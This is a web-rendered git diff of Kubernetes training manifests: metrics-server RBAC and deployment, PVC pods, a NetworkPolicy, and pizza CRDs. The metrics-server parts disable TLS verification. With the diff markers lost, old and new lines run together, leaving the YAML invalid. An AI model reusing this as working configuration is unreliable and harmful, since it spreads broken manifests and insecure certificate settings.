name: system:aggregated-metrics-reader
labels:
k8s-app: metrics-server
rbac.authorization.k8s.io/aggregate-to-view: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
resources: ["pods"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: metrics-server:system:auth-delegator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:auth-delegator
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
k8s-app: metrics-server
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-view: "true"
name: system:aggregated-metrics-reader
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
labels:
k8s-app: metrics-server
name: system:metrics-server
rules:
- apiGroups:
- ""
resources:
- pods
- nodes
- nodes/stats
- namespaces
- configmaps
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
labels:
k8s-app: metrics-server
name: metrics-server-auth-reader
namespace: kube-system
roleRef:
@@ -67,127 +38,101 @@ subjects:
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
labels:
k8s-app: metrics-server
name: metrics-server:system:auth-delegator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:auth-delegator
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
k8s-app: metrics-server
name: system:metrics-server
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:metrics-server
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
name: v1beta1.metrics.k8s.io
spec:
service:
name: metrics-server
namespace: kube-system
group: metrics.k8s.io
version: v1beta1
insecureSkipTLSVerify: true
groupPriorityMinimum: 100
versionPriority: 100
---
apiVersion: v1
kind: Service
kind: ServiceAccount
metadata:
labels:
k8s-app: metrics-server
name: metrics-server
namespace: kube-system
spec:
ports:
- name: https
port: 443
protocol: TCP
targetPort: https
selector:
k8s-app: metrics-server
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
k8s-app: metrics-server
name: metrics-server
namespace: kube-system
labels:
k8s-app: metrics-server
spec:
selector:
matchLabels:
k8s-app: metrics-server
strategy:
rollingUpdate:
maxUnavailable: 0
template:
metadata:
name: metrics-server
labels:
k8s-app: metrics-server
spec:
containers:
- args:
- --cert-dir=/tmp
- --secure-port=4443
- --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
- --kubelet-use-node-status-port
- --kubelet-insecure-tls
- --metric-resolution=5s
image: k8s.gcr.io/metrics-server/metrics-server:v0.4.3
imagePullPolicy: IfNotPresent
livenessProbe:
failureThreshold: 3
httpGet:
path: /livez
port: https
scheme: HTTPS
periodSeconds: 10
name: metrics-server
ports:
- containerPort: 4443
name: https
protocol: TCP
readinessProbe:
failureThreshold: 3
httpGet:
path: /readyz
port: https
scheme: HTTPS
periodSeconds: 10
securityContext:
readOnlyRootFilesystem: true
runAsNonRoot: true
runAsUser: 1000
volumeMounts:
- mountPath: /tmp
name: tmp-dir
nodeSelector:
kubernetes.io/os: linux
priorityClassName: system-cluster-critical
serviceAccountName: metrics-server
volumes:
- emptyDir: {}
name: tmp-dir
# mount in tmp so we can safely use from-scratch images and/or read-only containers
- name: tmp-dir
emptyDir: {}
containers:
- name: metrics-server
image: k8s.gcr.io/metrics-server-amd64:v0.3.3
imagePullPolicy: Always
volumeMounts:
- name: tmp-dir
mountPath: /tmp
args:
- --kubelet-preferred-address-types=InternalIP
- --kubelet-insecure-tls
- --metric-resolution=5s
---
apiVersion: apiregistration.k8s.io/v1
kind: APIService
apiVersion: v1
kind: Service
metadata:
name: metrics-server
namespace: kube-system
labels:
k8s-app: metrics-server
name: v1beta1.metrics.k8s.io
kubernetes.io/name: "Metrics-server"
spec:
group: metrics.k8s.io
groupPriorityMinimum: 100
insecureSkipTLSVerify: true
service:
name: metrics-server
namespace: kube-system
version: v1beta1
versionPriority: 100
selector:
k8s-app: metrics-server
ports:
- port: 443
protocol: TCP
targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: system:metrics-server
rules:
- apiGroups:
- ""
resources:
- pods
- nodes
- nodes/stats
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: system:metrics-server
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:metrics-server
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system

View File

@@ -1,20 +0,0 @@
kind: Pod
apiVersion: v1
metadata:
generateName: mounter-
labels:
container.training/mounter: ""
spec:
volumes:
- name: pvc
persistentVolumeClaim:
claimName: my-pvc-XYZ45
containers:
- name: mounter
image: alpine
stdin: true
tty: true
volumeMounts:
- name: pvc
mountPath: /pvc
workingDir: /pvc

View File

@@ -3,7 +3,8 @@ apiVersion: networking.k8s.io/v1
metadata:
name: deny-from-other-namespaces
spec:
podSelector: {}
podSelector:
matchLabels:
ingress:
- from:
- podSelector: {}

View File

@@ -14,7 +14,7 @@ spec:
initContainers:
- name: git
image: alpine
command: [ "sh", "-c", "apk add git && sleep 5 && git clone https://github.com/octocat/Spoon-Knife /www" ]
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
volumeMounts:
- name: www
mountPath: /www/

View File

@@ -1,24 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: openebs-local-hostpath-pod
spec:
volumes:
- name: storage
persistentVolumeClaim:
claimName: local-hostpath-pvc
containers:
- name: better
image: alpine
command:
- sh
- -c
- |
while true; do
echo "$(date) [$(hostname)] Kubernetes is better with PVs." >> /mnt/storage/greet.txt
sleep $(($RANDOM % 5 + 20))
done
volumeMounts:
- mountPath: /mnt/storage
name: storage

View File

@@ -1,14 +0,0 @@
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
name: pizzas.container.training
spec:
group: container.training
version: v1alpha1
scope: Namespaced
names:
plural: pizzas
singular: pizza
kind: Pizza
shortNames:
- piz

View File

@@ -1,20 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: pizzas.container.training
spec:
group: container.training
scope: Namespaced
names:
plural: pizzas
singular: pizza
kind: Pizza
shortNames:
- piz
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object

View File

@@ -1,32 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: pizzas.container.training
spec:
group: container.training
scope: Namespaced
names:
plural: pizzas
singular: pizza
kind: Pizza
shortNames:
- piz
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
required: [ spec ]
properties:
spec:
type: object
required: [ sauce, toppings ]
properties:
sauce:
type: string
toppings:
type: array
items:
type: string

Some files were not shown because too many files have changed in this diff Show More